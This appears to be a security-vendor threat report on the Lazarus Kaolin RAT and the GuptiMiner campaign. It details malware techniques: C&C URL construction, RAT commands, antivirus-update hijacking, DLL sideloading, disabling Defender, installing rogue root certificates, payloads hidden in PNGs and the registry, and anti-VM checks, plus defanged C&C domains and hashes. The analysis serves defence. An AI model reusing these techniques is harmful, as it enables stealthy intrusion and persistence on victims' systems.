Malware authors strategically employ multiple C&C servers as part of their operational tactics to achieve specific objectives. In this case, the primary goal is to obtain an additional data blob from the third C&C server, as depicted in Figure 5, specifically in step 7. Furthermore, the use of different C&C servers and diverse communication pathways adds an additional layer of complexity for security tools attempting to monitor such activities. This complexity makes tracking and identifying malicious activities more challenging, as compared to scenarios where a single C&C server is employed.

The malware then constructs a URL, by creating the query string with GET parameters (name/value pairs). The parameter name consists of a randomly selected word from the previously created dictionary and the value is generated as a random string of two characters. The format is as follows: 

"%addressOfThirdC&C%?%RandomWordFromDictonary%=%RandomString%" 

The URL generation involves the selection of words from a generated dictionary, as opposed to entirely random strings. This intended choice aims to enhance the appearance and legitimacy of the URL. The words, carefully curated from the dictionary, contribute to the appearance of a clean and organized URL, resembling those commonly associated with authentic applications. The terms such as "atype", "User",” or "type" are not arbitrary but rather thoughtfully chosen words from the created dictionary. By utilizing real words, the intention is to create a semblance of authenticity, making the HTTP POST payload appear more structured and in line with typical application interactions.  

Before dispatching the POST request to the third layer of the C&C server, the request is populated with additional key-value tuples separated by standard delimiters “?” and “=” between the key and value. In this scenario, it includes: 

%RandomWordFromDictonary %=%sleep_state_in_minutes%?%size_of_configuration_data%  

The data received from the third C&C server is parsed. The parsed data may contain an integer, describing sleep interval, or a data blob. This data blob is encoded using the base64 algorithm. After decoding the data blob, where the first 4 bytes indicate the size of the first part of the data blob, the remainder represents the second part of the data blob. 

The first part of the data blob is appended to the SECOND_ENCRYPTED_DLL as an overlay, obtained from the binary blob. After successfully decrypting and decompressing SECOND_ENCRYPTED_DLL, the process involves preparing the SECOND_ENCRYPTED_DLL, which is a Remote Access Trojan (RAT) component to be loaded into memory and executed with the specific parameters. 

The underlying motivation behind this maneuver remains shrouded in uncertainty. It appears that the attacker, by choosing this method, sought to inject a degree of sophistication or complexity into the process. However, from our perspective, this approach seems to border on overkill. We believe that a simpler method could have sufficed for passing the data blob to the Kaolin RAT.  

The second part of the data blob, once decrypted and decompressed, is handed over to the Kaolin RAT component, while the Kaolin RAT is executed in memory. Notably, the decryption key and initialization vector for decrypting the second part of the data blob reside within its initial 32 bytes.  

Kaolin RAT

A pivotal phase in orchestrating the attack involves the utilization of a Remote Access Trojan (RAT). As mentioned earlier, this Kaolin RAT is executed in memory and configured with specific parameters for proper functionality. It stands as a fully equipped tool, including file compression capabilities.  

However, in our investigation, the Kaolin RAT does not mark the conclusion of the attack. In the previous blog post, we already introduced another significant component – the FudModule rootkit. Thanks to our robust telemetry, we can confidently assert that this rootkit was loaded by the aforementioned Kaolin RAT, showcasing its capabilities to seamlessly integrate and deploy FudModule. This layered progression underscores the complexity and sophistication of the overall attack strategy. 

One of the important steps is establishing secure communication with the RAT’s C&C server, encrypted using the AES encryption algorithm. Despite the unavailability of the binary containing the communication functionalities (the RAT also relies on functions imported from FIRST_DLL_BINARY for networking), our understanding is informed by other components in the attack chain, allowing us to make certain assumptions about the communication method. 

The Kaolin RAT is loaded with six arguments, among which a key one is the base address of the network module DLL binary, previously also used in the RollMid loader. Another argument includes the configuration data from the second part of the received data blob. 

For proper execution, the Kaolin RAT needs to parse this configuration data, which includes parameters such as: 

  • Duration of the sleep interval. 
  • A flag indicating whether to collect information about available disk drives. 
  • A flag indicating whether to retrieve a list of active sessions on the remote desktop. 
  • Addresses of additional C&C servers. 

In addition, the Kaolin RAT must load specific functions from FIRST_DLL_BINARY, namely: 

  • SendDataFromURL 
  • ZipFolder 
  • UnzipStr 
  • curl_global_cleanup 
  • curl_global_init 

Although the exact method by which the Kaolin RAT sends gathered information to the C&C server is not precisely known, the presence of exported functions like "curl_global_cleanup" and "curl_global_init" suggests that the sending process involves again API calls from the curl library. 

For establishing communication, the Kaolin RAT begins by sending a POST request to the C&C server. In this first POST request, the malware constructs a URL containing the address of the C&C server. This URL generation algorithm is very similar to the one used in the RollMid loader. To the C&C address, the Kaolin RAT appends a randomly chosen word from the previously created dictionary (the same one as in the RollMid loader) along with a randomly generated string. The format of the URL is as follows: 

"%addressOfC&Cserver%?%RandomWordFromDictonary%=%RandomString%" 

The malware further populates the content of the POST request, utilizing the default "application/x-www-form-urlencoded" content type. The content of the POST request is subject to AES encryption and subsequently encoded with base64. 

Within the encrypted content, which is appended to the key-value tuples (see the form below), the following data is included (EncryptedContent)

  • Installation path of the RollFling loader and path to the binary blob 
  • Data from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Iconservice 
  • Kaolin RAT process ID 
  • Product name and build number of the operating system. 
  • Addresses of C&C servers. 
  • Computer name 
  • Current directory 

In the POST request with the encrypted content, the malware appends information about the generated key and initialization vector necessary for decrypting data on the backend. This is achieved by creating key-value tuples, separated by “&” and “=” between the key and value. In this case, it takes the following form: 

%RandomWordFromDictonary%=%TEMP_DATA%&%RandomWordFromDictonary%=%IV%%KEY%&%RandomWordFromDictonary%=%EncryptedContent%&%RandomWordFromDictonary%=%EncryptedHostNameAndIPAddr% 

Upon successfully establishing communication with the C&C server, the Kaolin RAT becomes prepared to receive commands. The received data is encrypted with the aforementioned generated key and initialization vector and requires decryption and parsing to execute a specific command within the RAT. 

When the command is processed the Kaolin RAT relays back the results to the C&C server, encrypted with the same AES key and IV. This encrypted message may include an error message, collected information, and the outcome of the executed function. 

The Kaolin RAT has the capability to execute a variety of commands, including: 

  • Updating the duration of the sleep interval. 
  • Listing files in a folder and gathering information about available disks. 
  • Updating, modifying, or deleting files. 
  • Changing a file’s last write timestamp. 
  • Listing currently active processes and their associated modules. 
  • Creating or terminating processes. 
  • Executing commands using the command line. 
  • Updating or retrieving the internal configuration. 
  • Uploading a file to the C&C server. 
  • Connecting to the arbitrary host. 
  • Compressing files. 
  • Downloading a DLL file from C&C server and loading it in memory, potentially executing one of the following exported functions: 
    • _DoMyFunc 
    • _DoMyFunc2 
    • _DoMyThread (executes a thread) 
    • _DoMyCommandWork 
  • Setting the current directory.

Conclusion

Our investigation has revealed that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Thanks to our robust telemetry, we were able to uncover almost the entire attack chain, thoroughly analyzing each stage. The Lazarus group’s level of technical sophistication was surprising and their approach to engaging with victims was equally troubling. It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts. 

Indicators of Compromise (IoCs) 

ISO
b8a4c1792ce2ec15611932437a4a1a7e43b7c3783870afebf6eae043bcfade30 

RollFling
a3fe80540363ee2f1216ec3d01209d7c517f6e749004c91901494fb94852332b 

NLS files
01ca7070bbe4bfa6254886f8599d6ce9537bafcbab6663f1f41bfc43f2ee370e
7248d66dea78a73b9b80b528d7e9f53bae7a77bad974ededeeb16c33b14b9c56 

RollSling
e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f
f47f78b5eef672e8e1bd0f26fb4aa699dec113d6225e2fcbd57129d6dada7def 

RollMid
9a4bc647c09775ed633c134643d18a0be8f37c21afa3c0f8adf41e038695643e 

Kaolin RAT
a75399f9492a8d2683d4406fa3e1320e84010b3affdff0b8f2444ac33ce3e690 

The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining

23 April 2024 at 09:00

Key Points

  • Avast discovered and analyzed a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers
  • Avast disclosed the vulnerability to both eScan antivirus and India CERT. On 2023-07-31, eScan confirmed that the issue was fixed and successfully resolved
  • The campaign was orchestrated by a threat actor with possible ties to Kimsuky
  • Two different types of backdoors have been discovered, targeting large corporate networks
  • The final payload distributed by GuptiMiner was also XMRig

Introduction

We’ve been tracking a curious one here. Firstly, GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker’s DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others.

The main objective of GuptiMiner is to distribute backdoors within big corporate networks. We’ve encountered two different variants of these backdoors: The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and cryptowallets on the local system.

Interestingly, GuptiMiner also distributes XMRig on the infected devices, which is a bit unexpected for such a thought-through operation.

The actors behind GuptiMiner have been capitalizing on an insecurity within an update mechanism of Indian antivirus vendor eScan to distribute the malware by performing a man-in-the-middle attack. We disclosed this security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved.

GuptiMiner is a long-standing malware, with traces of it dating back to 2018 though it is likely that it is even older. We have also found that GuptiMiner has possible ties to Kimsuky, a notorious North Korean APT group, by observing similarities between Kimsuky keylogger and parts of the GuptiMiner operation.
In this analysis, we will cover the GuptiMiner’s features and its evolution over time. We will also denote in which samples the particular features are contained or introduced to support the overall comprehension in the vast range of IoCs.

It is also important to note that since the users rarely install more than one AV on their machine, we may have limited visibility into GuptiMiner’s activity and its overall scope. Because of this, we might be looking only at the tip of the iceberg and the true scope of the entire operation may still be subject to discovery.

Infection Chain

To illustrate the complexity of the whole infection, we’ve provided a flow chart containing all parts of the chain. Note that some of the used filenames and/or workflows can slightly vary depending on the specific version of GuptiMiner, but the flowchart below illustrates the overall process.

The whole process starts with eScan requesting an update from the update server where an unknown MitM intercepts the download and swaps the update package with a malicious one. Then, eScan unpacks and loads the package and a DLL is sideloaded by eScan clean binaries. This DLL enables the rest of the chain, following with multiple shellcodes and intermediary PE loaders.

Resulted GuptiMiner consists of using XMRig on the infected machine as well as introducing backdoors which are activated when deployed in large corporate networks.

GuptiMiner’s infection chain

Evolution and Timelines

GuptiMiner has been active since at least 2018. Over the years, the developers behind it have improved the malware significantly, bringing new features to the table. We will describe the specific features in detail in respective subsections.

With that said, we also wanted to illustrate the significant IoCs in a timeline representation, how they changed over time – focusing on mutexes, PDBs, and used domains. These timelines were created based on scanning for the IoCs over a large sample dataset, taking the first and last compilation timestamps of the samples, then forming the intervals. Note that the scanned dataset is larger than listed IoCs in the IoC section. For more detailed list of IoCs, please visit our GitHub.

Domains in Time

In general, GuptiMiner uses the following types of domains during its operations: 

  • Malicious DNS – GuptiMiner hosts their own DNS servers for serving true destination domain addresses of C&C servers via DNS TXT responses 
  • Requested domains – Domains for which the malware queries the DNS servers for 
  • PNG download – Servers for downloading payloads in the form of PNG files. These PNG files are valid images (a logo of T-Mobile) that contain appended shellcodes at their end 
  • Config mining pool – GuptiMiner contains two different configurations of mining pools. One is hardcoded directly in the XMRig config which is denoted in this group 
  • Modified mining pool – GuptiMiner has the ability to modify the pre-defined mining pools which is denoted in this group 
  • Final C&C – Domains that are used in the last backdoor stage of GuptiMiner, providing additional malware capabilities in the backdoored systems 
  • Other – Domains serving different purposes, e.g., used in scripts 

Note that as the malware connects to the malicious DNS servers directly, the DNS protocol is completely separated from the DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware. The DNS protocol is used here as a functional equivalent of telnet. Because of this, this technique is not a DNS spoofing since spoofing traditionally happens on the DNS network. 

Furthermore, the fact that the servers for which GuptiMiner asks for in the Requested domain category actually exist is purely a coincidence, or rather a network obfuscation to confuse network monitoring tools and analysts.

Timeline illustrating GuptiMiner’s usage of domains in time

From this timeline, it is apparent that authors behind GuptiMiner realize the correct setup of their DNS servers is crucial for the whole chain to work properly. Because of this, we can observe the biggest rotation and shorter timeframes are present in the Malicious DNS group. 

Furthermore, since domains in the Requested domain group are irrelevant (at least from the technical viewpoint), we can notice that the authors are reusing the same domain names for longer periods of time. 

Mutexes in Time 

Mutexes help ensure correct execution flow of a software and malware authors often use these named objects for the same purpose. Since 2018, GuptiMiner has changed its mutexes multiple times. Most significantly, we can notice a change since 2021 where the authors changed the mutexes to reflect the compilation/distribution dates of their new versions. 

Timeline illustrating GuptiMiner’s usage of mutexes in time

An attentive reader can likely observe two takeaways: The first is the apparent outliers in usage of MIVOD_6, SLDV15, SLDV13, and Global\Wed Jun  2 09:43:03 2021. According to our data, these mutexes were truly reused multiple times in different builds, creating larger timeframes than expected. 

Another point is the re-introduction of PROCESS_ mutex near the end of last year. At this time, the authors reintroduced the mutex with the string in UTF-16 encoding, which we noted separately.

PDBs in Time 

With regard to debugging symbols, the authors of GuptiMiner left multiple PDB paths in their binaries. Most of the time, they contain strings like MainWork, Projects, etc. 

Timeline illustrating PDBs contained in GuptiMiner in time

Stage 0 – Installation Process 

Intercepting the Updates

Everyone should update their software, right? Usually, the individual either downloads the new version manually from the official vendor’s site, or – preferably – the software itself performs the update automatically without much thought or action from the user. But what happens when someone is able to hijack this automatic process? 

Our investigation started as we began to observe some of our users were receiving unusual responses from otherwise legitimate requests, for example on: 

http://update3[.]mwti[.]net/pub/update/updll3.dlz

This is truly a legitimate URL to download the updll3.dlz file which is, under normal circumstances, a legitimate archive containing the update of the eScan antivirus. However, we started seeing suspicious behavior on some of our clients, originating exactly from URLs like this. 

What we uncovered was that the actors behind GuptiMiner were performing man-in-the-middle (MitM) to download an infected installer on the victim’s PC, instead of the update. Unfortunately, we currently don’t have information on how the MitM was performed. We assume that some kind of pre-infection had to be present on the victim’s device or their network, causing the MitM. 

Update Package

c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3
(version.dll, 2018-04-19 09:47:41 UTC)

Throughout the analysis, we will try to describe not just the flow of the infection chain, malware techniques, and functionalities of the stages, but we will also focus on different versions, describing how the malware authors developed and changed GuptiMiner over time.

The first GuptiMiner sample that we were able to find was compiled on Tuesday, 2018-04-19 09:47:41 and it was uploaded to VirusTotal the day after from India, followed by an upload from Germany:
c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3

This file was named C:\Program Files\eScan\VERSION.DLL which points out the target audience is truly eScan users and it comes from an update package downloaded by the AV. 

Even though this version lacked several features present in the newer samples, the installation process is still the same, as follows: 

  1. The eScan updater triggers the update 
  2. The downloaded package file is replaced with a malicious one on the wire because of a missing HTTPS encryption (MitM is performed) 
  3. A malicious package updll62.dlz is downloaded and unpacked by eScan updater 
  4. The contents of the package contain a malicious DLL (usually called version.dll) that is sideloaded by eScan. Because of the sideloading, the DLL runs with the same privileges as the source process – eScan – and it is loaded next time eScan runs, usually after a system restart 
  5. If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1), the malware searches for services.exe process and injects its next stage into the first one it can find 
  6. Cleanup is performed, removing the update package 

The malicious DLL contains additional functions which are not present in the clean one. Thankfully the names are very verbose, so no analysis was required for most of them. The list of the functions can be seen below.

Additional exported functions

Some functions, however, are unique. For example, the function X64Call provides Heaven’s gate, i.e., it is a helper function for running x64 code inside a 32-bit process on a 64-bit system. The malware needs this to be able to run the injected shellcode depending on the OS version and thus the bitness of the services.exe process. 

Heaven’s gate to run the shellcode in x64 environment when required

To keep the original eScan functionality intact, the malicious version.dll also needs to handle the original legacy version.dll functionality. This is done by forwarding all the exported functions from the original DLL. When a call of the legacy DLL function is identified, GuptiMiner resolves the original function and calls it afterwards. 

Resolving function that ensures all the original version.dll exports are available

Injected Shellcode in services.exe 

After the shellcode is injected into services.exe, it serves as a loader of the next stage. This is done by reading an embedded PE file in a plaintext form. 

Embedded PE file loaded by the shellcode

This PE file is loaded by standard means, but additionally, the shellcode also destroys the PE’s DOS header and runs it by calling its entry point, as well as it removes the embedded PE from the original location memory altogether. 

Command Line Manipulation 

Across the entire GuptiMiner infection chain, every shellcode which is loading and injecting PE files also manipulates the command line of the current process. This is done by manipulating the result of GetCommandLineA/W which changes the resulted command line displayed for example in Task Manager. 

Command line manipulation function

After inspecting this functionality, we believe it either doesn’t work as the authors intended or we don’t understand its usage. Long story short, the command line is changed in such a way that everything before the first --parameter is skipped, and this parameter is then appended to the process name. 

To illustrate this, we could take a command:
notepad.exe param1 --XX param2
which will be transformed into:
notepad.exeXX param2 

However, we have not seen a usage like power --shell.exe param1 param2 that would result into:
powershell.exe param1 param2
nor have we seen any concealment of parameters (like usernames and passwords for XMRig), a type of behavior we would anticipate when encountering something like this. In either case, this functionality is obfuscating the command line appearance, which is worth mentioning. An interested reader can play around with the functionality at the awesome godbolt.org here

Code Virtualization 

7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6
(version.dll, 2018-06-12 03:30:01) 

Another version with a mutex ONLY_ME_V3 introduced a code virtualization. This can be observed by an additional section in the PE file called .v_lizer. This section was also renamed a few times in later builds.

A new section with the virtualized code is called .v_lizer

Thankfully the obfuscation is rather weak, provided the shellcode as well as the embedded PE file are still in the plaintext form. 

Furthermore, the authors started to distinguish between the version.dll stage and the PE file loaded by the shellcode by additional mutex. Previously, both stages used the shared mutex ONLY_ME_Vx, now the sideloading uses MTX_V101 as a mutex.

Stage 0.9 – Installation Improvements

3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c
(2021-03-28 14:41:07 UTC) 

The installation process has undergone multiple improvements over time, and, since it is rather different compared to older variants, we decided to describe it separately as an intermediary Stage 0.9. With these improvements, the authors introduced a usage of scheduled tasks, WMI events, two differently loaded next stages (Stage 1 – PNG loader), turning off Windows Defender, and installing crafted certificates to Windows. 

There are also multiple files dropped at this stage, enabling further sideloading by the malware. These files are clean and serve exclusively for sideloading purposes. The malicious DLLs that are being sideloaded, are two PNG loaders (Stage 1): 

  • de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739 *atiadlxx.dll 
  • e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee *BrLogAPI.dll 

WMI Events 

de48abe380bd84b5dc940743ad6727d0372f602a8871a4a0ae2a53b15e1b1739
(atiadlxx.dll, 2021-03-28 14:30:11 UTC) 

At this stage, WMI events are used for loading the first of the PNG loaders. This loader is extracted to a path:
C:\PROGRAMDATA\AMD\CNext\atiadlxx.dll 

Along with it, additional clean files are dropped, and they are used for sideloading, in either of these locations (can be both): 
C:\ProgramData\AMD\CNext\slsnotif.exe 
C:\ProgramData\AMD\CNext\msvcr120.dll

or
C:\Program Files (x86)\AMD\CNext\CCCSlim\slsnotify.exe
C:\Program Files (x86)\AMD\CNext\CCCSlim\msvcr120.dll 

The clean file slsnotify.exe is then registered via WMI event in such a way that it is executed when these conditions are met:

WMI conditions to trigger sideloading

In other words, the sideloading is performed on a workday in either January, July, or November. The numbers represented by %d are randomly selected values. The two possibilities for the hour are exactly two hours apart and fall within the range of 11–16 or 13–18 (inclusive). This conditioning further underlines the longevity of GuptiMiner operations.

Scheduled Tasks

e0dd8af1b70f47374b0714e3b368e20dbcfa45c6fe8f4a2e72314f4cd3ef16ee
(BrLogAPI.dll, 2021-03-28 14:10:27 UTC)

Similarly to the WMI events, GuptiMiner also drops a clean binary for sideloading at this location:
C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe 

The malicious PNG loader is then placed in one (or both) of these locations:
C:\Program Files (x86)\Brother\Brmfl14c\BrLogAPI.dll
C:\Program Files\Brother\Brmfl14c\BrLogAPI.dll 

The scheduled task is created by invoking a Task Scheduler. The scheduled task has these characteristics: 

  • It is created and named as C:\Windows\System32\Tasks\Microsoft\Windows\Brother\Brmfl14c 
  • Executes: C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe 
  • The execution is done under a folder containing the to-be-sideloaded DLL, e.g.: C:\Program Files (x86)\Brother\Brmfl14c\ 
  • The execution is performed with every boot (TASK_TRIGGER_BOOT) with SYSTEM privileges 

Deploy During Shutdown

3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c
(2021-03-28 14:41:07 UTC)

Let’s now look at how all these files, clean and malicious, are being deployed. One of GuptiMiner’s tricks is that it drops the final payload, containing PNG loader stage, only during the system shutdown process. Thus, this happens at the time other applications are shutting down and potentially not protecting the user anymore.

The main flow of the Stage 0.9 variant – drops final payload during system shutdown

From the code above, we can observe that only when the SM_SHUTTINGDOWN metric is non-zero, meaning the current session is shutting down, as well as all the supporting clean files were dropped successfully, the final payload DLL is dropped as well. 

An engaged reader could also notice in the code above that the first function that is being called disables Windows Defender. This is done by standard means of modifying registry keys. Only if the Defender is disabled can the malware proceed with the malicious actions. 

Adding Certificates to Windows

Most of the time, GuptiMiner uses self-signed binaries for their malicious activities. However, this time around, the attackers went a step further. In this case, both of the dropped PNG loader DLLs are signed with a custom trusted root anchor certification authority. This means that the signature is inherently untrusted since the attackers’ certification authority cannot be trusted by common verification processes in Windows. 

However, during the malware installation, GuptiMiner also adds a root certificate to Windows’ certificate store making this certification authority trusted. Thus, when such a signed file is executed, it is understood as correctly signed. This is done by using CertCreateCertificateContext, CertOpenStore, and CertAddCertificateContextToStore API functions.

Function which adds GuptiMiner’s root certificate to Windows

The certificate is present in a plaintext form directly in the GuptiMiner binary file.

A certificate in the plaintext form which is added as root to Windows by the malware

During our research, we found three different certificate issuers used during the GuptiMiner operations: 

  • GTE Class 3 Certificate Authority 
  • VeriSign Class 3 Code Signing 2010 
  • DigiCert Assured ID Code Signing CA 

Note that these names are artificial and any resemblance to legitimate certification authorities shall be considered coincidental. 

Storing Payloads in Registry 

8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049
(upgradeshow.dll, 2023-11-23 16:41:34 UTC) 

At later development stages, authors behind GuptiMiner started to integrate even better persistence of their payloads by storing the payloads in registry keys. Furthermore, the payloads were also encrypted by XOR using a fixed key. This ensures that the payloads look meaningless to the naked eye. 

We’ve discovered these registry key locations to be utilized for storing the payloads so far: 

  • SYSTEM\CurrentControlSet\Control\Nls\Sorting\Ids\en-US 
  • SYSTEM\CurrentControlSet\Control\PnP\Pci\CardList 
  • SYSTEM\CurrentControlSet\Control\Wdf\DMCF 
  • SYSTEM\CurrentControlSet\Control\StorVSP\Parsers 

Stage 1 – PNG Loader 

ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297
(2018-04-19 09:45:25 UTC) 

When the entry point of the PE file is executed by the shellcode from Stage 0, the malware first creates a scheduled task to attempt to perform cleanup of the initial infection by removing updll62.dlz archive and version.dll library from the system. 

Furthermore, the PE serves as a dropper for additional stages by contacting an attacker’s malicious DNS server. This is done by sending a DNS request to the attacker’s DNS server, obtaining the TXT record with the response. The TXT response holds an encrypted URL domain of a real C&C server that should be requested for an additional payload. This payload is a valid PNG image file (a T-Mobile logo) which also holds a shellcode appended to its end. The shellcode is afterwards executed by the malware in a separate thread, providing further malware functionality as a next stage.

Note that since the DNS server itself is malicious, the requested domain name doesn’t really matter – or, in a more abstract way of thinking about this functionality, it can be rather viewed as a “password” which is passed to the server, deciding whether the DNS server should or shouldn’t provide the desired TXT answer carrying the instructions. 

As we already mentioned in the Domains timeline section, there are multiple of such “Requested domains” used. In the version referenced here, we can see these two being used: 

  • ext.peepzo[.]com 
  • crl.peepzo[.]com 

and the malicious DNS server address is in this case: 

  • ns1.peepzo[.]com 

Here we can see a captured DNS TXT response using Wireshark. Note that Transaction ID = 0x034b was left unchanged during all the years of GuptiMiner operations. We find this interesting because we would expect this could get easily flagged by firewalls or EDRs in the affected network.

DNS TXT response captured by Wireshark

The requests when the malware is performing the queries is done in random intervals. The initial request for the DNS TXT record is performed in the first 20 minutes after the PNG loader is executed. The consecutive requests, which are done for the malware’s update routine, wait up to 69 hours between attempts. 

This update mechanism is reflected by creating separate mutexes with the shellcode version number which is denoted by the first two bytes of the decrypted DNS TXT response (see below for the decryption process). This ensures that no shellcode with the same version is run twice on the system. 

Mutex is numbered by the shellcode’s version information

DNS TXT Record Decryption

After the DNS TXT record is received, GuptiMiner decodes the content using base64 and decrypts it with a combination of MD5 used as a key derivation function and the RC2 cipher for the decryption. Note that in the later versions of this malware, the authors improved the decryption process by also using checksums and additional decryption keys. 

For the key derivation function and the decryption process, the authors decided to use standard Windows CryptoAPI functions.

Typical use of standard Windows CryptoAPI functions

Interestingly, a keen eye can observe an oversight in this initialization process shown above, particularly in the CryptHashData function. The prototype of the CryptHashData API function is:

BOOL CryptHashData(
  [in] HCRYPTHASH hHash,
  [in] const BYTE *pbData,
  [in] DWORD      dwDataLen,
  [in] DWORD      dwFlags
); 

The second argument of this function is a pointer to an array of bytes of a length of dwDataLen. However, this malware provides the string L"POVO@1" in a Unicode (UTF-16) format, represented by the array of bytes *pbData.

Thus, the first six bytes from this array are only db 'P', 0, 'O', 0, 'V', 0 which effectively cuts the key in half and padding it with zeroes. Even though the malware authors changed the decryption key throughout the years, they never fixed this oversight, and it is still present in the latest version of GuptiMiner. 

DNS TXT Record Parsing 

At this point, we would like to demonstrate the decrypted TXT record and how to parse it. In this example, while accessing the attacker’s malicious DNS server ns.srnmicro[.]net and the requested domain spf.microsoft[.]com, the server returned this DNS TXT response: 

VUBw2mOgagCILdD3qWwVMQFPUd0dPHO3MS/CwpL2bVESh9OnF/Pgs6mHPLktvph2

After fully decoding and decrypting this string, we get: 

This result contains multiple fields and can be interpreted as: 

Name Value 
Version 1 
Version 2 
Key size \r (= 0xD
Key Microsoft.com 
C&C URL http://www.deanmiller[.]net/m/ 
Checksum \xde

The first two bytes, Version 1 and Version 2, form the PNG shellcode version. It is not clear why there are two such versions since Version 2 is actually never used in the program. Only Version 1 is considered whether to perform the update – i.e., whether to download and load the PNG shellcode or not. In either case, we could look at these numbers as a major version and a minor version, and only the major releases serve as a trigger for the update process.

The third byte is a key size that denotes how many bytes should be read afterwards, forming the key. Furthermore, no additional delimiter is needed between the key and the URL since the key size is known and the URL follows. Finally, the two-byte checksum can be verified by calculating a sum of all the bytes (modulo 0xFF). 

After the DNS TXT record is decoded and decrypted, the malware downloads the next stage, from the provided URL, in the form of a PNG file. This is done by using standard WinINet Windows API, where the User-Agent is set to contain the bitness of the currently running process.

The malware communicates the bitness of the running process to the C&C

The C&C server uses the User-Agent information for two things: 

  • Provides the next stage (a shellcode) in the correct bitness 
  • Filters any HTTP request that doesn’t contain this information as a protection mechanism 

Parsing the PNG File 

After the downloaded file is a valid PNG file which also contains a shellcode appended at the end. The image is a T-Mobile logo and has exactly 805 bytes. These bytes are skipped by the malware and the rest of the file, starting at an offset 0x325, is decrypted by RC2 using the key provided in the TXT response (derived using MD5). The reason of using an image as this “prefix” is to further obfuscate the network communication where the payload looks like a legitimate image, likely overlooking the appended malware code. 

PNG file containing the shellcode starting at 0x325

After the shellcode is loaded from the position 0x325, it proceeds with loading additional PE loader from memory to unpack next stages using Gzip. 

IP Address Masking

294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a
(2023-11-09 14:19:45 UTC) 

In late 2023, the authors decided to ditch the years-long approach of using DNS TXT records for distributing payloads and they switched to IP address masking instead. 

This new approach consists of a few steps: 

  1. Obtain an IP address of a hardcoded server name registered to the attacker by standard means of using gethostbyname API function 
  2. For that server, two IP addresses are returned – the first is an IP address which is a masked address, and the second one denotes an available payload version and starts with 23.195. as the first two octets 
  3. If the version is newer than the current one, the masked IP address is de-masked and results in a real C&C IP address 
  4. The real C&C IP address is used along with a hardcoded constant string (used in a URL path) to download the PNG file containing the shellcode 

The de-masking process is done by XORing each octet of the IP address by 0xA, 0xB, 0xC, 0xD, respectively. The result is then taken, and a hardcoded constant string is added to the URL path. 

As an example, one such server we observed was www.elimpacific[.]net. It was, at the time, returning: 

The address 23.195.101[.]1 denotes a version and if it is greater than the current version, it performs the update by downloading the PNG file with the shellcode. This update is downloaded by requesting a PNG file from the real C&C server whose address is calculated by de-masking the 179.38.204[.]38 address: 

The request is then made, along with the calculated IP address 185.45.192[.]43 and a hardcoded constant elimp. Using a constant like this serves as an additional password, in a sense:
185.45.192[.]43/elimp/ 

GuptiMiner is requesting the payload from a real IP address

When the PNG file is downloaded, the rest of the process is the same as usual. 

We’ve discovered two servers for this functionality so far: 

Queried server URL path constant 
www.elimpacific[.]net elimp 
www.espcomp[.]net OpenSans 

Anti-VM and Anti-debug Tricks 

294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a
(2023-11-09 14:19:45 UTC) 

Along with other updates described above, we also observed an evolution in using anti-VM and anti-debugging tricks. These are done by checking well known disk drivers, registry keys, and running processes. 

GuptiMiner checks for these disk drivers by enumerating
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum

  • vmware 
  • qemu 
  • vbox 
  • virtualhd 

Specifically, the malware also checks the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Cylance for the presence of Cylance AV. 

As other anti-VM measures, the malware also checks whether the system has more than 4GB available RAM and at least 4 CPU cores. 

Last but not least, the malware also checks the presence of these processes by their prefixes: 

Process name prefix Tool name 
wireshar Wireshark 
windbg. WinDbg 
tcpview TCPView 
360 360 Total Security 
hips Huorong Internet Security (hipsdaemon.exe
proce Process Explorer 
procm Process Monitor 
ollydbg OllyDbg 

Storing Images in Registry

6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414
(2023-02-22 14:03:04 UTC) 

Similarly to Storing Payloads in Registry, in later stages of GuptiMiner, the authors also started to save the downloaded PNG images (containing the shellcodes) into registry as well. Contrary to storing the payloads, the images are not additionally XORed since the shellcodes in them are already encrypted using RC2 (see DNS TXT Record Decryption section for details). 

We’ve discovered these registry key locations to be utilized for storing the encrypted images containing the shellcodes so far: 

  • SYSTEM\CurrentControlSet\Control\Arbiters\Class 
  • SYSTEM\CurrentControlSet\Control\CMF\Class 
  • SYSTEM\CurrentControlSet\Control\CMF\CORE 
  • SYSTEM\CurrentControlSet\Control\CMF\DEF 
